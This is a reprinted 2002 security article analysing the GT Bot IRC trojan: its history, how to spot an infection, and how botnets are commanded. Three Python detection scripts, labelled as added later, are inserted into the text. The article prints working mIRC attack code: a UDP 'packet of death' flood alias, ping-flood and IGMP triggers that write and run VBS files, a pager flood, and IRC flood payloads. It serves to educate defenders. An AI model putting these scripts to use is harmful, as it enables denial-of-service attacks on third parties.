TrojanInfo.com
GTBot IRC DDoS Trojan Information

GT Bot History


Edited by TrojanInfo.com. Reprinted with permission from UChatNet. Original document is located at http://www.uchatnet.co.uk/news2.html

GT Bot (Global Threat) History and Original Findings

GT Bot (Global Threat) first appeared nearly two years ago and was written by Sony, mSg and DeadKode. GT Bot uses the legitimate mIRC program as its core, together with a program called HideWindow or a VBS script to make mIRC invisible on the host computer. mIRC is scripted to act as an IRC Bot that responds to remote commands from the Bot Master. When run, mIRC loads the scripts and the hiding program, connects to the predetermined IRC server and channel, and waits for commands. As the scripts are open source, it is very easy to rewrite or edit them with your own variations and custom command triggers. This is done often and accounts for the wide number of variants of this bot. Some have undergone simple edits, others are far more creative with additional scripts and routines, and some even add encryption to protect logins and access to commands. In some places GT Bot has also been referred to as Aristotles or IRC Trojan Aristotles; this is still GT Bot, and the name comes from a widespread variant that was controlled by the nickname Aristotles.

As noted earlier, many variants exist and it is all too easy to change the file names and the filename extensions. One filename that endures through nearly every version is MIRC.INI, as by default mIRC needs this file to load properly; if it does not find one, it creates a new one, which stops the Bot from launching. A search of the hard drive for mirc.ini reveals the location of each copy of mIRC, as the two must exist in the same directory. If you have one version of mIRC installed and a search reveals two mirc.ini files, it is possible you have a GT Bot infection. Simply counting the number of mirc.ini files against the number of mIRC installations you can account for reveals a lot of these infections easily. mIRC can be hex edited to look for a file other than mirc.ini when it is loaded; I have seen this done in a few cases and have examples of this variant. A very small percentage have done this, so the mirc.ini search is always the best initial method to use when looking for a GT Bot infection. One example of a bot that had been hex edited to load a file other than mirc.ini used the filename slave.fnt, along with many other files with the made-up *.FNT extension. I will be listing a lot of the default names that these files use so that it provides a useful reference when searching. However, this is not a fixed, set-in-stone guide, because names and extensions are so easy to change and are often changed.

GT Bots are also installed into various paths, the most popular being the Windows and Windows\System directories. Some of the smarter versions of GT Bot hide in the C:\Windows\Fonts directory, and for a good reason: if you open C:\Windows\Fonts in the normal view, you do not see executables, scripts or other directories in there. It has become a popular hiding place for GT Bot. Windows Explorer would show these hidden files or directories, and so would MS-DOS mode. I will provide examples below.

To find hidden directories in the Fonts directory, go to the C:\ drive, open the Windows directory and then open the Fonts directory. Leaving Fonts as the focused window on top, click on the Windows Start button and go to Run. A run prompt will appear; type the word "command" without the quotes into the box and click OK. You should see an MS-DOS prompt window appear showing C:\Windows\Fonts>. Now type "DIR/P/W" without the quotes and you will see a directory listing. Look closely for names in [ ], as these indicate directories. You should see [ . ] and [ .. ], which can be disregarded, but beware of any other directories in there. In the illustration below you will see [ GTBot ], which was a directory I created in there as an example by doing "mkdir GTBot". Often with GT Bot infections a directory called FONT will exist inside the real Fonts directory, and this is where the Bot is often hidden. To access this in a normal view, go to Start, then Run, and type the full path, for example C:\Windows\Fonts\GTBot, and click OK; it will open that directory. A lot of the files will be hidden files, so it is wise to use Folder Options to show hidden and system files and file extensions for known file types. Some bots are a little more devious and will create a directory inside Fonts with a name like VerdanaLarge.ttf, so that at a quick glance it looks like a font file, but the [ ] around the name will always give it away as a directory and you should take note of this. (Images 1 and 2)

To enable viewing all files and extensions, click on Start, then Settings and then Folder Options (see Figure 1). The Folder Options window should then appear (see Figure 2). Click on View, the centre one of the three tabs, then check the Show All Files radio button and uncheck the "Hide file extensions for known file types" check box.

If a GT Bot is found it can be dealt with in a few ways. One is to use a process viewer to kill the hidden processes it is running and then delete all of its files. Alternatively, a Trojan scanner will sometimes detect some of the files and remove them. Remember, as GT Bot is so widespread and easy to edit, many variants exist that could not possibly be detected by standard signature-file scanning, and this is why the use of a process monitor is by far the best method from my own experience in dealing with dozens of these GT Bots.

When GT Bots connect to IRC they are usually logged into by their Master, who then issues them with commands. You will get a clearer picture of this by looking at the screen captures [URL], which show various activity from spamming and flooding to all-out DDoS attacks. A lot can be learned about the structure of BotNets by observation, if you are able to track them down. Typically, GT BotNets can be traced in a matter of minutes by reading the script files after the Bot package has been executed and extracted. All of the connection information is within the scripting and often in the remote.ini: the IRC server address (usually a dynamic address), the channel to join, and the nickname, ident and real name the Bot assumes when executed. Dynamic addresses are often used so that BotNets can be redirected to other IRC servers; I have explained more about dynamic addresses [here URL] because they are relevant to all types of bots. On IRC servers owned and operated by the BotNet Master, great lengths are often taken to hide the channel that the Bots join and to secure it from curious people accidentally finding or stumbling across it.
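The tracing step described above can be automated. The following Python script is an added example, not code from the original article or from UChatNet: it pulls the server, channel and nickname settings out of a bot package's own text files (a remote script and a mirc.ini). The script fragment and ini text are constructed for the example, and the regular expressions only cover the command forms they contain (/server, /join and /nick in a script, and the [mirc] keys of mirc.ini, whose host= value is assumed to hold the server as "...SERVER:<host>:<port>...").

```python
"""
Added example (not part of the original article): extract the IRC connection
details from a GT Bot package's own script and mirc.ini text.
All sample text below is constructed; the parsing rules are assumptions
that match only the command forms shown in the samples.
"""
import configparser
import re
from typing import Dict

# Constructed fragment in the style of a GT Bot remote script.
SAMPLE_SCRIPT = r"""
on 1:START: { /server irc.example-dyndns.invalid 6667 | /nick gtb $+ $rand(1000,9999) }
on 1:CONNECT: { /join #example-chan examplekey | /mode $me +i }
on 1:DISCONNECT: { .timer 1 30 /server irc.example-dyndns.invalid 6667 }
"""

# Constructed [mirc] section of a mirc.ini shipped with the bot.
SAMPLE_INI = """
[mirc]
user=bot
email=bot@example.invalid
nick=gtb1234
anick=gtb4321
host=ExampleNetSERVER:irc.example-dyndns.invalid:6667GROUP:ExampleNet
"""

# /server <host> [port], /join <#chan> [key], /nick <text up to | or }>
SERVER_RE = re.compile(r"(?<![\w.])/?server\s+([\w.\-]+)(?:\s+(\d+))?", re.I)
JOIN_RE = re.compile(r"(?<![\w.])/?join\s+(#\S+)(?:\s+([^\s|}]+))?", re.I)
NICK_RE = re.compile(r"(?<![\w.])/?nick\s+([^|}]+)", re.I)


def extract_from_script(text: str) -> Dict[str, list]:
    """Collect unique server/channel/nick settings from mIRC script text."""
    found: Dict[str, list] = {"servers": [], "channels": [], "nicks": []}
    for host, port in SERVER_RE.findall(text):
        entry = (host.lower(), int(port) if port else 6667)  # 6667 assumed as the default port
        if entry not in found["servers"]:
            found["servers"].append(entry)
    for chan, key in JOIN_RE.findall(text):
        entry = (chan, key or None)
        if entry not in found["channels"]:
            found["channels"].append(entry)
    for nick in NICK_RE.findall(text):
        nick = nick.strip()
        if nick not in found["nicks"]:
            found["nicks"].append(nick)
    return found


def extract_from_ini(text: str) -> Dict[str, object]:
    """Read the identity keys and the server from the [mirc] section of mirc.ini."""
    cp = configparser.ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    cp.read_string(text)
    sec = cp["mirc"] if cp.has_section("mirc") else {}
    out: Dict[str, object] = {k: sec.get(k, "") for k in ("nick", "anick", "user", "email")}
    host = sec.get("host", "")
    # Assumed layout of host=: "<label>SERVER:<host>:<port>GROUP:<network>"; fall back to host:port.
    m = re.search(r"SERVER:([\w.\-]+):(\d+)", host) or re.search(r"([\w.\-]+):(\d+)", host)
    out["server"] = m.group(1).lower() if m else ""
    out["port"] = int(m.group(2)) if m else None
    return out


def trace_botnet(script_text: str, ini_text: str) -> Dict[str, object]:
    """Merge both sources into one summary of where the bot connects and who it claims to be."""
    s = extract_from_script(script_text)
    i = extract_from_ini(ini_text)
    servers = list(s["servers"])
    if i["server"] and (i["server"], i["port"]) not in servers:
        servers.append((i["server"], i["port"]))
    nicks = s["nicks"] + [n for n in (i["nick"], i["anick"]) if n]
    return {"servers": servers, "channels": s["channels"], "nicks": nicks,
            "ident": i["user"], "email": i["email"]}


if __name__ == "__main__":
    for key, value in trace_botnet(SAMPLE_SCRIPT, SAMPLE_INI).items():
        print(f"{key}: {value}")
```

On a real sample you would feed it the text of every *.ini and script file found beside the bot's mirc.ini; dynamic DNS names in the server list are the pivot point the article mentions for following a BotNet when it is moved between servers.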
 

Often channel names are used which contain special characters such as #, with a channel key that again uses special characters like . So to join the channel you would have to type /join # , which is /join <#chan> <key>. I explain IRC modes and what they do with more relevant information [hereURL], as again it applies to all genres of Bots. The IRCD (IRC server software) of choice is usually Unreal IRCD [URL http://www.unrealircd.com], as it is easy to set up and configure and has some rather unique modes unavailable in other similar IRCD software, including +u, which hides the user nickname list from anyone that joins the channel, giving the appearance that the channel is completely empty, and host masking, to stop a person from obtaining IP addresses. Even if the channel had several hundred Bots in it, they would remain invisible unless you know the workarounds, which I describe in the IRC modes section.

Once logged into, the Bots can be commanded with trigger commands sent to the IRC channel. The bot will normally respond to certain trigger words that the script is monitoring the channel for. For example, here is a snippet of code from a GT Bot and an explanation of what it does.

if ($1 == !icqpage) { if ($2 == $null) { /msg # Error/Syntax:(!icqpage from subject body to) | halt } { .set %icqfrom $2- | .set %icqsubject $3- | .set %icqbody $4- | .set %icqto $5 | .sockclose mICQ* | .timer 1 3 .sockopen mICQ wwp.icq.com 80 } }

When a Bot Master sends the text "!icqpage from_me the_subject a_pager_for_you 111111111111", the Bot will open a connection to wwp.icq.com on remote port 80 and send that string of information, and will even prompt the user if they mis-entered the information. Each time that command is sent, ICQ account 111111111111 would get one WWW Pager from each Bot. Several hundred Bots doing this repeatedly would generate quite a huge flood of these pagers. At the receiving end they can easily all be closed at once or added to ignore, but it is still somewhat annoying to the target. Worse are the DDoS attacks these can create, with various different types of built-in attacks. I will briefly try to explain some of them below.

Packet Of Death: this piece of code generates UDP packets to random ports in the range 1000 - 6669, of user-inputted size and amount. "!packet 10.0.01 9999 3000" would attempt to send 9999 bytes of data 3000 times to IP address 10.0.01 on random ports between port 1000 and port 6669. Once again, if the information is entered incorrectly, the GT Bot will message the channel and report the correct syntax to use. When the attack has finished, the GT Bot will message the Master that it has completed its task and is ready to accept further orders.

alias packetofdeath {
if ($3 = $null) { notice $nick Error Please use !packet address size amount | halt }
if ($chr(46) !isin $1) || ($2 !isnum) || ($3 !isnum) { notice $nick Error Please use !packet address size amount | halt }
if ($remove($1,$chr(46)) !isnum) { notice $nick Error no letters may be contained in the ip | unset %packet.* | halt }
.notice $nick Now Packeting $1 with $2 bytes $3 times
set %packet.ip $1
set %packet.bytes $2
set %packet.amount $3
set %packet.count 0
set %packet.port $rand(1,6) $+ $rand(0,6) $+ $rand(0,6) $+ $rand(0,9)
:start
if (%packet.count >= %packet.amount) { sockclose packet | unset %packet.* | .notice $nick Packeting has completed | halt }
inc %packet.count 1
/sockudp -b packet 60 %packet.ip %packet.port %packet.bytes
goto start
}

ICMP: an ICMP attack allowing variable packet sizes and amounts, which writes and runs a VBS file that in turn runs PING.EXE with parameters. This piece of code, on command, sends a ping flood of user-definable size and amount to the target IP address. As you can most likely imagine, it hardly takes a genius to figure out that many machines sending a lot of malicious traffic can easily cause chaos and take down high-bandwidth targets very effectively, even if they are denying the ICMP at the router. The effect is like someone snorkel diving: if your snorkel becomes full of water, you can close your mouth to stop yourself swallowing the water, but you still cannot breathe.

This form of attack is generally referred to as a bandwidth saturation attack, because it stops any useful data from getting in or out as it completely fills the pipes. When this command is run, it removes icmp.vbs if it exists, writes a new file called icmp.vbs, and then runs it. Once icmp.vbs has been run, it in turn runs PING.EXE with the parameters

"PING -N <Number of Packets> -L <Size in Bytes> -W 0 <IP Address of Target>"

The parameter -W is set to 0, which is the timeout to wait for a reply before sending the next ping echo request, meaning it will send a constant stream instead of waiting for a reply to the last echo. (See image.)

Against this form of attack, a firewall would stop the pings reaching the machine and the machine would run normally behind the firewall, unaffected by the attack but with no real communication with the Internet: effectively silenced, or offline to anybody trying to access it remotely. If it is a machine providing web services, such as a website, this can be catastrophic financially for a business, with the web site completely inaccessible. It might as well be switched off or unplugged from the network while the attack rages on. Most DDoS attacks die out eventually, usually when the attacking machines go offline or their owners realize that they are attacking someone. Of course, attacks such as this can be successfully filtered upstream of the target by the Internet Service Provider or upstream provider, as long as the specific attack can be identified and a ruleset crafted for it.

It would be worth checking any machine for the existence of ICMP.VBS to make sure it is not taking part in malicious attacks.

if ($1 == !icmp) { if ($2 == $null) { /msg # Error/Syntax:(!icmp ip packetsize howmany, ie: !icmp 127.0.0.1 2000 1000) | halt } | .remove icmp.vbs | .write icmp.vbs Set src3 = CreateObject("Wscript.shell") | .write icmp.vbs src3.run "command /c ping -n $4 -l $3 -w 0 $2 ",0,true | .run icmp.vbs }

IGMP is an attack that uses a third-party DOS-based IGMP tool to send malicious fragmented IGMP packets to the target machine. This routine is almost identical to the above, only it runs a third-party tool called IGMP.EXE, which has preset parameters and only needs the IP address to be inputted. Fragmented IGMP packets will often cause un-patched Windows 98 machines to BSoD (Blue Screen of Death) or in some cases force the computer to reboot. This form of attack will again saturate bandwidth, even if the target is protected from IGMP protocol packets. As above, a search for IGMP.VBS and IGMP.EXE is always worthwhile to make sure that the machine is not being made to send malicious traffic to third parties.
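The host checks spread through this article (counting mirc.ini copies against the mIRC installs you can account for, listing sub-directories hidden inside the Fonts directory including ones named to look like font files, the made-up *.FNT extension of the slave.fnt variant, and the ICMP.VBS, IGMP.VBS and IGMP.EXE helpers used by the flood routines) can be run in one pass. The script below is an added example, not part of the original article; the directory tree it scans is constructed in a temporary folder so it runs anywhere, and the rule that a .fnt file is only suspicious outside the Fonts directory itself is an assumption made here because Windows keeps legitimate raster .fnt fonts inside Fonts.

```python
"""
Added example (not from the original article): scan a directory tree for the
GT Bot indicators the article describes. The sample tree is constructed.
"""
import os
import shutil
import tempfile
from pathlib import Path
from typing import Dict, List

# File names taken from the article's own snippets and description.
ATTACK_HELPERS = {"icmp.vbs", "igmp.vbs", "igmp.exe"}
FONT_LIKE_SUFFIXES = (".ttf", ".fon", ".fnt")


def scan_tree(root: Path, known_mirc_installs: int = 0) -> Dict[str, List[str]]:
    """Walk `root` and collect indicators; every list holds path strings or notes."""
    findings: Dict[str, List[str]] = {
        "mirc_ini": [], "fonts_subdirs": [], "fnt_files": [], "attack_helpers": [], "notes": []}
    for dirpath, dirnames, filenames in os.walk(root):
        here = Path(dirpath)
        in_fonts = here.name.lower() == "fonts"
        if in_fonts:
            # The normal Fonts view hides sub-directories, so every one is worth a look,
            # especially those named to pass for a font file at a glance.
            for sub in dirnames:
                findings["fonts_subdirs"].append(str(here / sub))
                if sub.lower().endswith(FONT_LIKE_SUFFIXES):
                    findings["notes"].append(f"directory named like a font file: {here / sub}")
        for name in filenames:
            low = name.lower()
            if low == "mirc.ini":          # each copy marks a directory mIRC can be run from
                findings["mirc_ini"].append(str(here))
            if low in ATTACK_HELPERS:      # helper files written or used by the flood routines
                findings["attack_helpers"].append(str(here / name))
            if low.endswith(".fnt") and not in_fonts:   # assumption: real .fnt fonts live in Fonts
                findings["fnt_files"].append(str(here / name))
    extra = len(findings["mirc_ini"]) - known_mirc_installs
    if extra > 0:
        findings["notes"].append(f"{extra} more mirc.ini copies than accounted-for mIRC installs")
    return findings


def build_sample_tree() -> Path:
    """Constructed layout mimicking an infected machine (placeholder contents, not real data)."""
    root = Path(tempfile.mkdtemp(prefix="gtbot-demo-"))
    layout = {
        "Program Files/mIRC/mirc.ini": "[mirc]\nnick=legituser\n",           # the owner's real mIRC
        "Windows/mirc.ini": "[mirc]\nnick=gtb0001\n",                          # bot copy in Windows dir
        "Windows/Fonts/arial.ttf": "",                                         # ordinary font file
        "Windows/Fonts/VerdanaLarge.ttf/mirc.ini": "[mirc]\nnick=gtb0002\n",  # directory posing as a font
        "Windows/Fonts/VerdanaLarge.ttf/icmp.vbs": "' constructed placeholder\n",
        "Windows/Fonts/VerdanaLarge.ttf/slave.fnt": "",
        "Windows/System/igmp.exe": "",
    }
    for rel, content in layout.items():
        path = root / rel
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_text(content)
    return root


def demo() -> Dict[str, List[str]]:
    """Build the sample tree, scan it assuming one legitimate mIRC install, then clean up."""
    root = build_sample_tree()
    try:
        return scan_tree(root, known_mirc_installs=1)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for kind, items in demo().items():
        print(kind)
        for item in items:
            print("   ", item)
```

On a real machine, call scan_tree() on the Windows directory (or the whole drive) with the number of mIRC installations you know about; anything in fonts_subdirs or attack_helpers deserves the process-viewer follow-up described earlier.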

if ($1 == !igmp) { if ($2 == $null) { /msg # Error/Syntax:(!igmp ip.here) | halt } | .remove igmp.vbs | .write igmp.vbs Set src3 = CreateObject("Wscript.shell") | .write igmp.vbs src3.run "command /c igmp $2 ",0,true | .run igmp.vbs }

Other similar attacks that are often included are Pepsi, Shiver, Fraggle and ATH0 (aimed at machines with a dialup connection; "AT H0" is the modem command to hang up, i.e. disconnect).

The GT Bot is also very widely used to attack other IRC networks by flooding channels with huge amounts of text or messages to individual users. A lot of these attacks can be ignored on a small scale, but on a large scale they cause wide-scale IRC server disruption, and in many instances with lower-bandwidth providers will bring down the whole server and any others running on the same network.

If a BotNet of 200 GT Bots created 5 clones each to join an IRC server, that would generate a total of 1000 connections. Most small IRC servers allow 256 simultaneous connections, up to a maximum of 1024. A large amount of this form of traffic rapidly uses all of the available ports, and in a lot of cases the whole lot hitting almost all at once will stall the whole server. GT Bots often enter an IRC network in huge numbers, then join target channels and flood them with endless repetitive data, which causes normal users to become disconnected or their IRC client to freeze because it cannot process the rapidly scrolling flood of garbage data fast enough. These kinds of floods often run up to 150 kbps of data through the IRC server and will often incur penalties for the owner of a free service for extra bandwidth consumption.

From my own personal studies of BotNets, I have seen many evolve and grow from nearly nothing, because I have sometimes found them within hours of their first being created. By far the most successful and largest BotNets, which have grown the most rapidly, have been ones that exploited some other weakness, by acting like a worm, by infecting insecure Windows 2000 IIS (Internet Information Server) servers, or by infecting hosts with existing Trojan infections such as SubSeven. [Interview with mobman the SubSeven Author here URL] Below is a paste of some of the garbage data that Bot FloodNets often send to IRC channels and users. Imagine this data being sent constantly, over and over again, by a large number of clones until the attack is called off or the IRC server goes offline.

Pure Pewp
/timer 1 5 /sockwrite -n $sock(clone*,%cc) PRIVMSG $2
p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w pp e wp p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p

Death by Math
/timer 1 16 /sockwrite -n $sock(clone*,%cc) PRIVMSG $2

GT Special
/timer 1 22 /sockwrite -n $sock(clone*,%cc) PRIVMSG $2
3GT 4SP E C I AL 12 3GT 4SP E C I AL 3GT4SP E C I AL 12 3GT 4SP E C I AL 3GT
4SP E C I AL 12 3GT 4SP E C I AL 3GT4SP E C I AL 12 3GT 4SP E C I AL 3GT4SP E C I AL 12 3GT 4SP E C I AL 3GT4SP E C I AL 12 3GT 4SP E C I AL 3GT4SP E C I AL 12 3GT 4SP E C I AL 3GT4SP E C I AL 12 3GT 4SP E C I AL 3GT4SP E C I AL 12 3GT 4SP E C I AL 3GT
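The two IRC-side behaviours this article describes, a Bot Master issuing trigger commands in the control channel and clones hammering a target channel with the same repetitive payload, are both visible to anyone watching the server's traffic. The detector below is an added example, not code from the original article or from UChatNet: it runs over constructed raw IRC protocol lines, the trigger words are the four shown in the article's snippets, the nicknames and addresses are made up, and the thresholds are illustrative.

```python
"""
Added example (not from the original article): flag GT Bot trigger commands
and clone floods in a list of raw IRC lines (":nick!user@host PRIVMSG target :text").
The sample lines and thresholds are constructed for illustration.
"""
import re
from collections import Counter, defaultdict
from typing import Dict, List, Optional, Tuple

TRIGGERS = {"!icqpage", "!packet", "!icmp", "!igmp"}   # triggers seen in the article's snippets
PRIVMSG_RE = re.compile(
    r"^:(?P<nick>[^!\s]+)(?:!\S*)?\s+PRIVMSG\s+(?P<target>\S+)\s+:(?P<text>.*)$")

Alert = Tuple[str, str, str, str]   # (kind, who, target, detail)


def parse_privmsg(line: str) -> Optional[Tuple[str, str, str]]:
    """Return (nick, target, text) for a PRIVMSG line, None for anything else."""
    m = PRIVMSG_RE.match(line.rstrip("\r\n"))
    return (m["nick"], m["target"], m["text"]) if m else None


def repetition_ratio(text: str) -> float:
    """Share of tokens that are repeats: 0.0 when all distinct, near 1.0 for 'p e w p p e w p ...'."""
    toks = text.split()
    return 1.0 - len(set(toks)) / len(toks) if toks else 0.0


def analyse(lines: List[str], clone_threshold: int = 3, repeat_threshold: int = 3,
            rep_ratio: float = 0.8, min_len: int = 40) -> List[Alert]:
    alerts: List[Alert] = []
    senders_by_payload: Dict[Tuple[str, str], set] = defaultdict(set)   # (target, text) -> nicks
    sends: Counter = Counter()                                          # (nick, target, text) -> count
    for line in lines:
        msg = parse_privmsg(line)
        if msg is None:
            continue
        nick, target, text = msg
        words = text.split()
        if words and words[0].lower() in TRIGGERS:       # Master commanding the bots
            alerts.append(("bot-trigger", nick, target, text))
        if len(text) >= min_len and repetition_ratio(text) >= rep_ratio:
            senders_by_payload[(target, text)].add(nick)
            sends[(nick, target, text)] += 1
    # Same junk payload from several nicks at once: a clone pack hitting one channel.
    for (target, text), nicks in senders_by_payload.items():
        if len(nicks) >= clone_threshold:
            alerts.append(("clone-flood", ",".join(sorted(nicks)), target, text[:24].strip()))
    # Same junk payload repeated by one nick: the /timer loop in the flood scripts.
    for (nick, target, text), n in sends.items():
        if n >= repeat_threshold:
            alerts.append(("repeat-flood", nick, target, f"{n}x {text[:24].strip()}"))
    return alerts


def count_by_kind(alerts: List[Alert]) -> Dict[str, int]:
    return dict(Counter(kind for kind, *_ in alerts))


PEWP = "p e w p " * 12   # constructed payload in the style of the "Pure Pewp" flood above
SAMPLE_LOG = [
    ":aristotles!m@example.invalid PRIVMSG #control :!icmp 192.0.2.10 2000 1000",
    ":aristotles!m@example.invalid PRIVMSG #control :!packet 192.0.2.10 9999 3000",
    ":alice!a@example.invalid PRIVMSG #target :hi all, is anyone around for the game tonight?",
    "PING :irc.example.invalid",
] + [f":clone0{i}!gt@10.0.0.{i} PRIVMSG #target :{PEWP}" for i in range(1, 6)] \
  + [f":clone01!gt@10.0.0.1 PRIVMSG #target :{PEWP}" for _ in range(2)]


if __name__ == "__main__":
    for alert in analyse(SAMPLE_LOG):
        print(alert)
```

The repetition ratio is what separates a flood payload from a long ordinary message: the constructed pewp line is 48 tokens drawn from three distinct words, while the chatty line from alice has no repeated token at all and is never counted.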

Often BNC (Bounce For IRC) is used to load clones onto IRC networks; this works in a very similar way to loading clones via a WinGate. It is done to evade any bans that may be in effect and to be able to reconnect clients from banned hosts or domains.

These bots have nearly the same capability as common middle-of-the-range Trojans and can gather various information about the system they are installed on and output it to an IRC channel. An example can be seen below, from a version that we tested on one of our laboratory machines.

Info Date:[Monday September 10 2001] Time:[09:42 pm] OS:[Windows98] UpTime:[55mins 36secs] Current-URL:[http://pv1fd.pav1.hotmail.msn.com/cgi-bin/HoTMaiL?curmbox=F000000001&a=853e1cbe0240dc4d970aac200fec8216&_lang=EN]
Name: LockDownLaboratory()ICQ:[1111111111.uin] Key[H922W2R887TH2KDDPCP9F8FDH]

ICQ Number and Windows product key edited for security purposes.

Other information can also be easily gathered, including the size of logical drives, space used and remaining space, connection type and up and down speed, available RAM and CPU speed. This is usually done by adding ready-made *.dll files such as moo.dll or info.dll to the package, calling the *.dll and outputting the result to the Bot channel. Many bots also search for media files such as *.mpg, *.mpeg, *.rm, *.ram and *.mp3 and serve them on IRC as fileservers, or can just open an fserv on drive C:\ or any other available drive. (FServ is the IRC equivalent of FTP, only it is a read-only service.)

The ability to delete or run commands and files is also usually included in GT Bot, and many also have a web downloader included so it can be run on command to fetch a predetermined update or new version and then install it. Some have the ability to write new scripts, so all the Master has to do is give the GT Bot a new script to load by pasting it line by line into the channel. The Bot then writes the script, it can be loaded, and the newly added commands become accessible.

GT Bot is often used to scan for Trojan-compromised hosts and then output the IP address of any hosts found into the channel. Some even go as far as to connect to SubSeven infections and make them update from the web with a GT Bot which, once successfully downloaded, will be run and will remove the SubSeven infection and replace it.

Conclusion

It can be safely concluded that the spread of these Bots and the number of variants is set to increase significantly in the next year or so, until the public as a whole becomes more aware of the threat and takes proper action to avoid infection. With the increase in the number of BotNets there will also be an increase in the number of DDoS attacks reported, as the two go hand in hand. It is evident that awareness and education are the best policy that can be adopted.

   
2002 Uchatnets UK IRC, Division of Uchatnets Networks International. Uchatnets is a registered trademark of Uchatnet Networks International. All rights reserved, Uchatnets/Uchatnet IRC Networks. Reprinted with permission.
